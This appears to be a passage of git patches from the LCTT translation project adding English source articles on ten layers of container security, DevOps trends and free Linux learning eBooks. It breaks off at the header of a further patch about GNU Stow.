+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDU_UnspokenBlockers_1110_A.png?itok=x8A9mqVA)
+
+Containers provide an easy way to package applications and deliver them seamlessly from development to test to production. This helps ensure consistency across a variety of environments, including physical servers, virtual machines (VMs), or private or public clouds. These benefits are leading organizations to rapidly adopt containers in order to easily develop and manage the applications that add business value.
+
+Enterprises require strong security, and anyone running essential services in containers will ask, "Are containers secure?" and "Can we trust containers with our applications?"
+
+Securing containers is a lot like securing any running process. You need to think about security throughout the layers of the solution stack before you deploy and run your container. You also need to think about security throughout the application and container lifecycle.
+
+Try these 10 key elements to secure different layers of the container solution stack and different stages of the container lifecycle.
+
+### 1. The container host operating system and multi-tenancy
+
+Containers make it easier for developers to build and promote an application and its dependencies as a unit and to get the most use of servers by enabling multi-tenant application deployments on a shared host. It's easy to deploy multiple applications on a single host, spinning up and shutting down individual containers as needed. To take full advantage of this packaging and deployment technology, the operations team needs the right environment for running containers. Operations needs an operating system that can secure containers at the boundaries, securing the host kernel from container escapes and securing containers from each other.
+
+### 2. Container content (use trusted sources)
+
+Containers are Linux processes with isolation and resource confinement that enable you to run sandboxed applications on a shared host kernel. Your approach to securing containers should be the same as your approach to securing any running process on Linux. Dropping privileges is important and still the best practice. Even better is to create containers with the least privilege possible. Containers should run as a regular user, not as root. Next, make use of the multiple levels of security available in Linux. Linux namespaces, Security-Enhanced Linux ( [SELinux][1] ), [cgroups][2] , capabilities, and secure computing mode ( [seccomp][3] ) are five of the security features available for securing containers.
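+
+As a rough sketch of what least privilege can look like in practice (this example is not part of the original text; it assumes a Docker-compatible CLI and uses a placeholder image name), you can run a container as an unprivileged user, drop all Linux capabilities, and keep its root filesystem read-only:
+```
+
+$ docker run --user 1000:1000 --cap-drop ALL --read-only my-app-image   # my-app-image is a placeholder
+
+```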
+
+When it comes to security, what's inside your container matters. For some time now, applications and infrastructures have been composed from readily available components. Many of these are open source packages, such as the Linux operating system, Apache Web Server, Red Hat JBoss Enterprise Application Platform, PostgreSQL, and Node.js. Containerized versions of these packages are now also readily available, so you don't have to build your own. But, as with any code you download from an external source, you need to know where the packages originated, who built them, and whether there's any malicious code inside them.
+
+### 3. Container registries (secure access to container images)
+
+Your teams are building containers that layer content on top of downloaded public container images, so it's critical to manage access to and promotion of the downloaded container images and the internally built images in the same way other types of binaries are managed. Many private registries support storage of container images. Select a private registry that helps to automate policies for the use of container images stored in the registry.
+
+### 4. Security and the build process
+
+In a containerized environment, the software-build process is the stage in the lifecycle where application code is integrated with needed runtime libraries. Managing this build process is key to securing the software stack. Adhering to a "build once, deploy everywhere" philosophy ensures that the product of the build process is exactly what is deployed in production. It's also important to maintain the immutability of your containers--in other words, do not patch running containers; rebuild and redeploy them instead.
+
+Whether you work in a highly regulated industry or simply want to optimize your team's efforts, design your container image management and build process to take advantage of container layers to implement separation of control, so that the:
+
+ * Operations team manages base images
+ * Architects manage middleware, runtimes, databases, and other such solutions
+ * Developers focus on application layers and just write code
+
+
+
+Finally, sign your custom-built containers so that you can be sure they are not tampered with between build and deployment.
+
+### 5. Control what can be deployed within a cluster
+
+In case anything falls through during the build process, or for situations where a vulnerability is discovered after an image has been deployed, add yet another layer of security in the form of tools for automated, policy-based deployment.
+
+Let's look at an application that's built using three container image layers: core, middleware, and the application layer. An issue is discovered in the core image and that image is rebuilt. Once the build is complete, the image is pushed to the container platform registry. The platform can detect that the image has changed. For builds that are dependent on this image and have triggers defined, the platform will automatically rebuild the application image, incorporating the fixed libraries.
+
+Once the build is complete, the image is pushed to the container platform's internal registry. The platform immediately detects changes to images in its internal registry and, for applications where triggers are defined, automatically deploys the updated image, ensuring that the code running in production is always identical to the most recently updated image. All these capabilities work together to integrate security capabilities into your continuous integration and continuous deployment (CI/CD) process and pipeline.
+
+### 6. Container orchestration: Securing the container platform
+
+Of course, applications are rarely delivered in a single container. Even simple applications typically have a frontend, a backend, and a database. And deploying modern microservices applications in containers means deploying multiple containers, sometimes on the same host and sometimes distributed across multiple hosts or nodes.
+
+When managing container deployment at scale, you need to consider:
+
+ * Which containers should be deployed to which hosts?
+ * Which host has more capacity?
+ * Which containers need access to each other? How will they discover each other?
+ * How will you control access to--and management of--shared resources, like network and storage?
+ * How will you monitor container health?
+ * How will you automatically scale application capacity to meet demand?
+ * How will you enable developer self-service while also meeting security requirements?
+
+
+
+Given the wealth of capabilities for both developers and operators, strong role-based access control is a critical element of the container platform. For example, the orchestration management servers are a central point of access and should receive the highest level of security scrutiny. APIs are key to automating container management at scale and used to validate and configure the data for pods, services, and replication controllers; perform project validation on incoming requests; and invoke triggers on other major system components.
+
+### 7. Network isolation
+
+Deploying modern microservices applications in containers often means deploying multiple containers distributed across multiple nodes. With network defense in mind, you need a way to isolate applications from one another within a cluster. Typical public cloud container services, like Google Container Engine (GKE), Azure Container Services, or Amazon Web Services (AWS) Container Service, are single-tenant services. They let you run your containers on the VM cluster that you initiate. For secure container multi-tenancy, you want a container platform that allows you to take a single cluster and segment the traffic to isolate different users, teams, applications, and environments within that cluster.
+
+With network namespaces, each collection of containers (known as a "pod") gets its own IP and port range to bind to, thereby isolating pod networks from each other on the node. Pods from different namespaces (projects) cannot send packets to or receive packets from pods and services of a different project by default, with the exception of options noted below. You can use these features to isolate developer, test, and production environments within a cluster; however, this proliferation of IP addresses and ports makes networking more complicated. In addition, containers are designed to come and go. Invest in tools that handle this complexity for you. The preferred tool is a container platform that uses [software-defined networking][4] (SDN) to provide a unified cluster network that enables communication between containers across the cluster.
+
+### 8. Storage
+
+Containers are useful for both stateless and stateful applications. Protecting attached storage is a key element of securing stateful services. Container platforms should provide plugins for multiple flavors of storage, including the Network File System (NFS), AWS Elastic Block Store (EBS), GCE Persistent Disks, GlusterFS, iSCSI, RADOS (Ceph), Cinder, etc.
+
+A persistent volume (PV) can be mounted on a host in any way supported by the resource provider. Providers will have different capabilities, and each PV's access modes are set to the specific modes supported by that particular volume. For example, NFS can support multiple read/write clients, but a specific NFS PV might be exported on the server as read only. Each PV gets its own set of access modes describing that specific PV's capabilities, such as ReadWriteOnce, ReadOnlyMany, and ReadWriteMany.
+
+### 9. API management, endpoint security, and single sign-on (SSO)
+
+Securing your applications includes managing application and API authentication and authorization.
+
+Web SSO capabilities are a key part of modern applications. Container platforms can come with various containerized services for developers to use when building their applications.
+
+APIs are key to applications composed of microservices. These applications have multiple independent API services, leading to proliferation of service endpoints, which require additional tools for governance. An API management tool is also recommended. All API platforms should offer a variety of standard options for API authentication and security, which can be used alone or in combination, to issue credentials and control access.
+
+These options include standard API keys, application ID and key pairs, and OAuth 2.0.
+
+### 10. Roles and access management in a cluster federation
+
+In July 2016, Kubernetes 1.3 introduced [Kubernetes Federated Clusters][5]. This is one of the exciting new features evolving in the Kubernetes upstream, currently in beta in Kubernetes 1.6. Federation is useful for deploying and accessing application services that span multiple clusters running in the public cloud or enterprise datacenters. Multiple clusters can be useful to enable application high availability across multiple availability zones or to enable common management of deployments or migrations across multiple cloud providers, such as AWS, Google Cloud, and Azure.
+
+When managing federated clusters, you must be sure that your orchestration tools provide the security you need across the different deployment platform instances. As always, authentication and authorization are key--as well as the ability to securely pass data to your applications, wherever they run, and manage application multi-tenancy across clusters. Kubernetes is extending Cluster Federation to include support for Federated Secrets, Federated Namespaces, and Ingress objects.
+
+### Choosing a container platform
+
+Of course, it is not just about security. Your container platform needs to provide an experience that works for your developers and your operations team. It needs to offer a secure, enterprise-grade container-based application platform that enables both developers and operators, without compromising the functions needed by each team, while also improving operational efficiency and infrastructure utilization.
+
+Learn more in Daniel's talk, [Ten Layers of Container Security][6], at [Open Source Summit EU][7], which will be held October 23-26 in Prague.
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/10/10-layers-container-security
+
+作者:[Daniel Oh][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/daniel-oh
+[1]:https://en.wikipedia.org/wiki/Security-Enhanced_Linux
+[2]:https://en.wikipedia.org/wiki/Cgroups
+[3]:https://en.wikipedia.org/wiki/Seccomp
+[4]:https://en.wikipedia.org/wiki/Software-defined_networking
+[5]:https://kubernetes.io/docs/concepts/cluster-administration/federation/
+[6]:https://osseu17.sched.com/mobile/#session:f2deeabfc1640d002c1d55101ce81223
+[7]:http://events.linuxfoundation.org/events/open-source-summit-europe
From 4c2c10444846f272a74ed0f7da4a382bff759752 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:44:19 +0800
Subject: [PATCH 086/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=E2=80=99s=20?=
=?UTF-8?q?next=20in=20DevOps:=205=20trends=20to=20watch?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...hat-s next in DevOps- 5 trends to watch.md | 88 +++++++++++++++++++
1 file changed, 88 insertions(+)
create mode 100644 sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md
diff --git a/sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md b/sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md
new file mode 100644
index 0000000000..cf98d6be44
--- /dev/null
+++ b/sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md
@@ -0,0 +1,88 @@
+What’s next in DevOps: 5 trends to watch
+======
+
+![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Magnifying%20Glass%20Code.png?itok=IqZsJCEH)
+
+The term "DevOps" is typically credited [to this 2008 presentation][1] on agile infrastructure and operations. Now ubiquitous in IT vocabulary, the mashup word is less than 10 years old: We're still figuring out this modern way of working in IT.
+
+Sure, people who have been "doing DevOps" for years have accrued plenty of wisdom along the way. But most DevOps environments - and the mix of people and [culture][2], process and methodology, and tools and technology - are far from mature.
+
+More change is coming. That's kind of the whole point. "DevOps is a process, an algorithm," says Robert Reeves, CTO at [Datical][3]. "Its entire purpose is to change and evolve over time."
+
+What should we expect next? Here are some key trends to watch, according to DevOps experts.
+
+### 1. Expect increasing interdependence between DevOps, containers, and microservices
+
+The forces driving the proliferation of DevOps culture themselves may evolve. Sure, DevOps will still fundamentally knock down traditional IT silos and bottlenecks, but the reasons for doing so may become more urgent. Exhibits A & B: Growing interest in and [adoption of containers and microservices][4]. The technologies pack a powerful, scalable one-two punch, best paired with planned, [ongoing management][5].
+
+"One of the major factors impacting DevOps is the shift towards microservices," says Arvind Soni, VP of product at [Netsil][6], adding that containers and orchestration are enabling developers to package and deliver services at an ever-increasing pace. DevOps teams will likely be tasked with helping to fuel that pace and to manage the ongoing complexity of a scalable microservices architecture.
+
+### 2. Expect fewer safety nets
+
+DevOps enables teams to build software with greater speed and agility, deploying faster and more frequently, while improving quality and stability. But good IT leaders don't typically ignore risk management, so plenty of early DevOps iterations began with safeguards and fallback positions in place. To get to the next level of speed and agility, more teams will take off their training wheels.
+
+"As teams mature, they may decide that some of the guard rails that were added early on may not be required anymore," says Nic Grange, CTO of [Retriever Communications][7]. Grange gives the example of a staging server: As DevOps teams mature, they may decide it's no longer necessary, especially if they're rarely catching issues in that pre-production environment. (Grange points out that this move isn't advisable for inexperienced teams.)
+
+"The team may be at a point where it is confident enough with its monitoring and ability to identify and resolve issues in production," Grange says. "The process of deploying and testing in staging may just be slowing them down without any demonstrable value."
+
+### 3. Expect DevOps to spread elsewhere
+
+DevOps brings two traditional IT groups, development and operations, into much closer alignment. As more companies see the benefits in the trenches, the culture is likely to spread. It's already happening in some organizations, evident in the increasing appearance of the term "DevSecOps," which reflects the intentional and much earlier inclusion of security in the software development lifecycle.
+
+"DevSecOps is not only tools, it is integrating a security mindset into development practices early on," says Derek Weeks, VP and DevOps advocate at [Sonatype][8].
+
+Doing that isn't a technology challenge, it's a cultural challenge, says [Red Hat][9] security strategist Kirsten Newcomer.
+
+"Security teams have historically been isolated from development teams - and each team has developed deep expertise in different areas of IT," Newcomer says. "It doesn't need to be this way. Enterprises that care deeply about security and also care deeply about their ability to quickly deliver business value through software are finding ways to move security left in their application development lifecycles. They're adopting DevSecOps by integrating security practices, tooling, and automation throughout the CI/CD pipeline. To do this well, they're integrating their teams - security professionals are embedded with application development teams from inception (design) through to production deployment. Both sides are seeing the value - each team expands their skill sets and knowledge base, making them more valuable technologists. DevOps done right - or DevSecOps - improves IT security."
+
+Beyond security, look for DevOps expansion into areas such as database teams, QA, and even potentially outside of IT altogether.
+
+"This is a very DevOps thing to do: Identify areas of friction and resolve them," Datical's Reeves says. "Security and databases are currently the big bottlenecks for companies that have previously adopted DevOps."
+
+### 4. Expect ROI to increase
+
+As companies get deeper into their DevOps work, IT teams will be able to show greater return on investment in methodologies, processes, containers, and microservices, says Eric Schabell, global technology evangelist director, Red Hat. "The Holy Grail was to be moving faster, accomplishing more and becoming flexible. As these components find broader adoption and organizations become more vested in their application the results shall appear," Schabell says.
+
+"Everything has a learning curve with a peak of excitement as the emerging technologies gain our attention, but also go through a trough of disillusionment when the realization hits that applying it all is hard. Finally, we'll start to see a climb out of the trough and reap the benefits that we've been chasing with DevOps, containers, and microservices."
+
+### 5. Expect success metrics to keep evolving
+
+"I believe that two of the core tenets of the DevOps culture, automation and measurement, are never 'done,'" says Mike Kail, CTO at [CYBRIC][10] and former CIO at Yahoo. "There will always be opportunities to automate a task or improve upon an already automated solution, and what is important to measure will likely change and expand over time. This maturation process is a continuous journey, not a destination or completed task."
+
+In the spirit of DevOps, that maturation and learning will also depend on collaboration and sharing. Kail thinks it's still very much early days for Agile methodologies and DevOps culture, and that means plenty of room for growth.
+
+"As more mature organizations continue to measure actionable metrics, I believe - [I] hope - that those learnings will be broadly shared so we can all learn and improve from them," Kail says.
+
+As Red Hat technology evangelist [Gordon Haff][11] recently noted, organizations working hard to improve their DevOps metrics are using factors tied to business outcomes. "You probably don't really care about how many lines of code your developers write, whether a server had a hardware failure overnight, or how comprehensive your test coverage is," [writes Haff][12]. "In fact, you may not even directly care about the responsiveness of your website or the rapidity of your updates. But you do care to the degree such metrics can be correlated with customers abandoning shopping carts or leaving for a competitor."
+
+Some examples of DevOps metrics tied to business outcomes include customer ticket volume (as an indicator of overall customer satisfaction) and Net Promoter Score (the willingness of customers to recommend a company's products or services). For more on this topic, see his full article, [DevOps metrics: Are you measuring what matters?][12]
+
+### No rest for the speedy
+
+By the way, if you were hoping things would get a little more leisurely anytime soon, you're out of luck.
+
+"If you think releases are fast today, you ain't seen nothing yet," Reeves says. "That's why bringing all stakeholders, including security and database teams, into the DevOps tent is so crucial. The friction caused by these two groups today will only grow as releases increase exponentially."
+
+--------------------------------------------------------------------------------
+
+via: https://enterprisersproject.com/article/2017/10/what-s-next-devops-5-trends-watch
+
+作者:[Kevin Casey][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://enterprisersproject.com/user/kevin-casey
+[1]:http://www.jedi.be/presentations/agile-infrastructure-agile-2008.pdf
+[2]:https://enterprisersproject.com/article/2017/9/5-ways-nurture-devops-culture
+[3]:https://www.datical.com/
+[4]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
+[5]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul
+[6]:https://netsil.com/
+[7]:http://retrievercommunications.com/
+[8]:https://www.sonatype.com/
+[9]:https://www.redhat.com/en/
+[10]:https://www.cybric.io/
+[11]:https://enterprisersproject.com/user/gordon-haff
+[12]:https://enterprisersproject.com/article/2017/7/devops-metrics-are-you-measuring-what-matters
From 1958de2b4bf84b5fab8d5dcaad1d62279bd2ddcb Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:46:05 +0800
Subject: [PATCH 087/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2025=20Free=20Books?=
=?UTF-8?q?=20To=20Learn=20Linux=20For=20Free?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...6 25 Free Books To Learn Linux For Free.md | 295 ++++++++++++++++++
1 file changed, 295 insertions(+)
create mode 100644 sources/tech/20170216 25 Free Books To Learn Linux For Free.md
diff --git a/sources/tech/20170216 25 Free Books To Learn Linux For Free.md b/sources/tech/20170216 25 Free Books To Learn Linux For Free.md
new file mode 100644
index 0000000000..e549f50ea3
--- /dev/null
+++ b/sources/tech/20170216 25 Free Books To Learn Linux For Free.md
@@ -0,0 +1,295 @@
+25 Free Books To Learn Linux For Free
+======
+Brief: In this article, I'll share with you the best resources to **learn Linux for free**. This is a collection of websites, online video courses, and free eBooks.
+
+**How to learn Linux?**
+
+This is perhaps the most commonly asked question in our Facebook group for Linux users.
+
+The answer to this simple-looking question 'how to learn Linux' is not at all simple.
+
+The problem is that different people mean different things by learning Linux.
+
+  * If someone has never used Linux, be it the command line or the desktop version, that person might just want to know more about it.
+  * If someone uses Windows as their desktop but has to use the Linux command line at work, that person might be interested in learning Linux commands.
+  * If someone has been using Linux for some time and is aware of the basics, he or she might want to go to the next level.
+  * If someone is just interested in getting their way around a specific Linux distribution.
+  * If someone is trying to improve or learn Bash scripting, which is almost synonymous with the Linux command line.
+  * If someone wants to make a career as a Linux SysAdmin or is trying to improve his/her sysadmin skills.
+
+
+
+You see, the answer to "how do I learn Linux" depends on what kind of Linux knowledge you are seeking. And for this purpose, I have collected a bunch of resources that you could use for learning Linux.
+
+These free resources include eBooks, video courses, websites, etc. They are divided into sub-categories so that you can easily find what you are looking for when you seek to learn Linux.
+
+Again, there is no **best way to learn Linux**. It's totally up to you how you go about learning Linux, whether through online web portals, downloaded eBooks, video courses, or something else.
+
+Let's see how you can learn Linux.
+
+**Disclaimer**: All the books listed here are legal to download. The sources mentioned here are the official sources, as per my knowledge. However, if you find otherwise, please let me know so that I can take appropriate action.
+
+![Best Free eBooks to learn Linux for Free][1]
+
+## 1. Free materials to learn Linux for absolute beginners
+
+So perhaps you have just heard of Linux from your friends or from a discussion online. You are intrigued by the hype around Linux, and you are overwhelmed by the vast amount of information available on the internet but just cannot figure out exactly where to look to learn more about Linux.
+
+Worry not. Most of us, if not all, have been in your position.
+
+### Introduction to Linux by Linux Foundation [Video Course]
+
+If you have no idea what Linux is and you want to get started with it, I suggest you go ahead with the free video course provided by the [Linux Foundation][2] on [edX][3]. Consider it an official course by the organization that 'maintains' Linux. And yes, it is endorsed by [Linus Torvalds][4], the father of Linux himself.
+
+[Introduction To Linux][5]
+
+### Linux Journey [Online Portal]
+
+Not official and perhaps not very popular. But this little website is the perfect place for no-nonsense Linux learning for beginners.
+
+The website is designed beautifully and is well organized based on the topics. It also has interactive quizzes that you can take after reading a section or chapter. My advice: bookmark this website:
+
+[Linux Journey][6]
+
+### Learn Linux in 5 Days [eBook]
+
+This brilliant eBook is available for free exclusively to It's FOSS readers all thanks to [Linux Training Academy][7].
+
+Written with absolute beginners in mind, this free Linux eBook gives you a quick overview of Linux, common Linux commands, and other things that you need to learn to get started with Linux.
+
+You can download the book from the page below:
+
+[Learn Linux In 5 Days][8]
+
+### The Ultimate Linux Newbie Guide [eBook]
+
+This is a free-to-download eBook for Linux beginners. The eBook starts by explaining what Linux is and then goes on to cover more practical usage of Linux as a desktop.
+
+You can download the latest version of this eBook from the link below:
+
+[The Ultimate Linux Newbie Guide][9]
+
+## 2. Free Linux eBooks for Beginners to Advanced
+
+This section lists out those Linux eBooks that are 'complete' in nature.
+
+What I mean is that these are like academic textbooks that focus on each and every aspect of Linux, or at least most of them. You can read them as an absolute beginner or for a deeper understanding as an intermediate Linux user. You can also use them for reference even if you are at an expert level.
+
+### Introduction to Linux [eBook]
+
+Introduction to Linux is a free eBook from [The Linux Documentation Project][10] and it is one of the most popular free Linux books out there. Though I think some parts of this book need to be updated, it is still a very good book to teach you about Linux, its file system, the command line, networking, and other related stuff.
+
+[Introduction To Linux][11]
+
+### Linux Fundamentals [eBook]
+
+This free eBook by Paul Cobbaut teaches you about Linux history, installation and focuses on the basic Linux commands you should know. You can get the book from the link below:
+
+[Linux Fundamentals][12]
+
+### Advanced Linux Programming [eBook]
+
+As the name suggests, this is for advanced users who develop, or want to develop, software for Linux. It deals with sophisticated features such as multiprocessing, multi-threading, interprocess communication, and interaction with hardware devices.
+
+Following the book will help you develop faster, more reliable, and more secure programs that use the full capability of a GNU/Linux system.
+
+[Advanced Linux Programming][13]
+
+### Linux From Scratch [eBook]
+
+If you think you know enough about Linux and you are a pro, then why not create your own Linux distribution? Linux From Scratch (LFS) is a project that provides you with step-by-step instructions for building your own custom Linux system, entirely from source code.
+
+Call it DIY Linux, but this is a great way to take your Linux expertise to the next level.
+
+There are various sub-parts of this project; you can check them out on its website and download the books from there.
+
+[Linux From Scratch][14]
+
+## 3. Free eBooks to learn Linux command line and Shell scripting
+
+The real power of Linux lies in the command line, and if you want to conquer Linux, you must learn the Linux command line and shell scripting.
+
+In fact, if you have to work in a Linux terminal at your job, having a good knowledge of the Linux command line will actually help you in your tasks and perhaps also help you advance your career (as you'll be more efficient).
+
+In this section, we'll see various free eBooks on Linux commands.
+
+### GNU/Linux Command−Line Tools Summary [eBook]
+
+This eBook from The Linux Documentation Project is a good place to begin with Linux command line and get acquainted with Shell scripting.
+
+[GNU/Linux Command−Line Tools Summary][15]
+
+### Bash Reference Manual from GNU [eBook]
+
+This is a free eBook to download from [GNU][16]. As the name suggests, it deals with the Bash shell (if I can call it that). This book has over 175 pages and covers a number of topics around the Linux command line in Bash.
+
+You can get it from the link below:
+
+[Bash Reference Manual][17]
+
+### The Linux Command Line [eBook]
+
+This 500+ page free eBook by William Shotts is a must-have for anyone who is serious about learning the Linux command line.
+
+Even if you think you know things about Linux, you'll be amazed at how much this book still teaches you.
+
+It covers things from beginner to advanced level. I bet you'll be a heck of a lot better Linux user after reading this book. Download it and keep it with you always.
+
+[The Linux Command Line][18]
+
+### Bash Guide for Beginners [eBook]
+
+If you just want to get started with Bash scripting, this could be a good companion for you. The Linux Documentation Project is behind this eBook again, and it's the same author who wrote the Introduction to Linux eBook (discussed earlier in this article).
+
+[Bash Guide for Beginners][19]
+
+### Advanced Bash-Scripting Guide [eBook]
+
+If you think you already know the basics of Bash scripting and you want to take your skills to the next level, this is what you need. This book has over 900 pages of various advanced commands and their examples.
+
+[Advanced Bash-Scripting Guide][20]
+
+### The AWK Programming Language [eBook]
+
+Not the prettiest book here but if you really need to go deeper with your scripts, this old-yet-gold book could be helpful.
+
+[The AWK Programming Language][21]
+
+### Linux 101 Hacks [eBook]
+
+This 270-page eBook from The Geek Stuff teaches you the essentials of the Linux command line with easy-to-follow practical examples. You can get the book from the link below:
+
+[Linux 101 Hacks][22]
+
+## 4. Distribution specific free learning material
+
+This section deals with material that is dedicated to a certain Linux distribution. What we saw so far was Linux in general, more focused on file systems, commands, and other core stuff.
+
+These books, on the other hand, can be seen as manuals or getting-started guides for various Linux distributions. So if you are using a certain Linux distribution or planning to use it, you can refer to these resources. And yes, these books are more desktop-Linux focused.
+
+I would also like to add that most Linux distributions have their own wiki or documentation sections, which are often pretty vast. You can always refer to them when you are online.
+
+### Ubuntu Manual
+
+Needless to say, this eBook is for Ubuntu users. It's an independent project that provides the Ubuntu manual in the form of a free eBook. It is updated for each version of Ubuntu.
+
+The book is rightly called a manual because it is basically a collection of step-by-step instructions aimed at absolute beginners to Ubuntu. So, you get to know the Unity desktop, how to get around it, how to find applications, etc.
+
+It's a must-have if you have never used Ubuntu's Unity desktop because it helps you figure out how to use Ubuntu for your daily tasks.
+
+[Ubuntu Manual][23]
+
+### For Linux Mint: Just Tell Me Damnit! [eBook]
+
+A very basic eBook that focuses on Linux Mint. It shows you how to install Linux Mint in a virtual machine, how to find software, install updates and customize the Linux Mint desktop.
+
+You can download the eBook from the link below:
+
+[Just Tell Me Damnit!][24]
+
+### Solus Linux Manual [eBook]
+
+Caution! This used to be the official manual from Solus Linux, but I cannot find it mentioned on the Solus Project's website anymore. I don't know whether it's outdated or not. But in any case, a little something about Solus Linux won't really hurt, will it?
+
+[Solus Linux User Guide][25]
+
+## 5. Free eBooks for SysAdmin
+
+This section is dedicated to SysAdmins, the superheroes for developers. I have listed a few free eBooks here for SysAdmins which will surely help anyone who is already a SysAdmin or aspires to be one. I must add that you should also focus on essential Linux command line skills, as they will make your job easier.
+
+### The Debian Administration's Handbook [eBook]
+
+If you use Debian Linux for your servers, this is your bible. The book starts with Debian history, installation, package management, etc., and then moves on to cover topics like [LAMP][26], virtual machines, storage management, and other core sysadmin stuff.
+
+[The Debian Administration's Handbook][27]
+
+### Advanced Linux System Administration [eBook]
+
+This is an ideal book if you are preparing for [LPI certification][28]. The book gets straight to the topics essential for sysadmins, so knowledge of the Linux command line is a prerequisite in this case.
+
+[Advanced Linux System Administration][29]
+
+### Linux System Administration [eBook]
+
+Another free eBook by Paul Cobbaut. This 370-page eBook covers networking, disk management, user management, kernel management, library management, etc.
+
+[Linux System Administration][30]
+
+### Linux Servers [eBook]
+
+One more eBook from Paul Cobbaut of [linux-training.be][31]. This book covers web servers, MySQL, DHCP, DNS, Samba, and other file servers.
+
+[Linux Servers][32]
+
+### Linux Networking [eBook]
+
+Networking is the bread and butter of a SysAdmin, and this book by Paul Cobbaut (again) is a good reference.
+
+[Linux Networking][33]
+
+### Linux Storage [eBook]
+
+This book by Paul Cobbaut (yes, him again) explains disk management on Linux in detail and introduces a lot of other storage-related technologies.
+
+[Linux Storage][34]
+
+### Linux Security [eBook]
+
+This is the last eBook by Paul Cobbaut in our list here. Security is one of the most important parts of a sysadmin's job. This book focuses on file permissions, ACLs, SELinux, users and passwords, etc.
+
+[Linux Security][35]
+
+## Your favorite Linux learning material?
+
+I know that this is a good collection of free Linux eBooks. But this could always be made better.
+
+If you have some other resources that could be helpful in learning Linux, do share them with us. Please be sure to share only legal downloads so that I can update this article with your suggestion(s) without any problem.
+
+I hope you find this article helpful in learning Linux. Your feedback is welcome :)
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/learn-linux-for-free/
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/abhishek/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/02/free-ebooks-linux-800x450.png
+[2]:https://www.linuxfoundation.org/
+[3]:https://www.edx.org
+[4]:https://www.youtube.com/watch?v=eE-ovSOQK0Y
+[5]:https://www.edx.org/course/introduction-linux-linuxfoundationx-lfs101x-0
+[6]:https://linuxjourney.com/
+[7]:https://www.linuxtrainingacademy.com/
+[8]:https://courses.linuxtrainingacademy.com/itsfoss-ll5d/
+[9]:https://linuxnewbieguide.org/ulngebook/
+[10]:http://www.tldp.org/index.html
+[11]:http://tldp.org/LDP/intro-linux/intro-linux.pdf
+[12]:http://linux-training.be/linuxfun.pdf
+[13]:http://advancedlinuxprogramming.com/alp-folder/advanced-linux-programming.pdf
+[14]:http://www.linuxfromscratch.org/
+[15]:http://tldp.org/LDP/GNU-Linux-Tools-Summary/GNU-Linux-Tools-Summary.pdf
+[16]:https://www.gnu.org/home.en.html
+[17]:https://www.gnu.org/software/bash/manual/bash.pdf
+[18]:http://linuxcommand.org/tlcl.php
+[19]:http://www.tldp.org/LDP/Bash-Beginners-Guide/Bash-Beginners-Guide.pdf
+[20]:http://www.tldp.org/LDP/abs/abs-guide.pdf
+[21]:https://ia802309.us.archive.org/25/items/pdfy-MgN0H1joIoDVoIC7/The_AWK_Programming_Language.pdf
+[22]:http://www.thegeekstuff.com/linux-101-hacks-ebook/
+[23]:https://ubuntu-manual.org/
+[24]:http://downtoearthlinux.com/resources/just-tell-me-damnit/
+[25]:https://drive.google.com/file/d/0B5Ymf8oYXx-PWTVJR0pmM3daZUE/view
+[26]:https://en.wikipedia.org/wiki/LAMP_(software_bundle)
+[27]:https://debian-handbook.info/about-the-book/
+[28]:https://www.lpi.org/our-certifications/getting-started
+[29]:http://www.nongnu.org/lpi-manuals/manual/pdf/GNU-FDL-OO-LPI-201-0.1.pdf
+[30]:http://linux-training.be/linuxsys.pdf
+[31]:http://linux-training.be/
+[32]:http://linux-training.be/linuxsrv.pdf
+[33]:http://linux-training.be/linuxnet.pdf
+[34]:http://linux-training.be/linuxsto.pdf
+[35]:http://linux-training.be/linuxsec.pdf
From 1fa01213657c8c40ecfd8605eab7938c46770056 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:47:55 +0800
Subject: [PATCH 088/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use=20?=
=?UTF-8?q?GNU=20Stow=20to=20manage=20programs=20installed=20from=20source?=
=?UTF-8?q?=20and=20dotfiles?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...rams installed from source and dotfiles.md | 142 ++++++++++++++++++
1 file changed, 142 insertions(+)
create mode 100644 sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md
diff --git a/sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md b/sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md
new file mode 100644
index 0000000000..9db9a90f39
--- /dev/null
+++ b/sources/tech/20171007 How to use GNU Stow to manage programs installed from source and dotfiles.md
@@ -0,0 +1,142 @@
